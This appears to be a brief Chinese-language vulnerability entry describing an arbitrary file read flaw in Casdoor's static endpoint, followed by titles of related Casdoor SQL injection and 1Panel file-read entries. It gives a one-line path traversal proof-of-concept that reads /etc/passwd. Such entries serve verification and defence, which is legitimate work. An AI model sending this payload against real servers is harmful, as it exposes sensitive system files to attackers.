Casdoor static 存在任意文件读取漏洞,攻击者通过发送特殊的请求包可以获取服务器中的敏感文件
登陆页面
验证POC
/static/../../../../../../../../../../../etc/passwd
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124 1Panel loadfile 后台文件读取漏洞
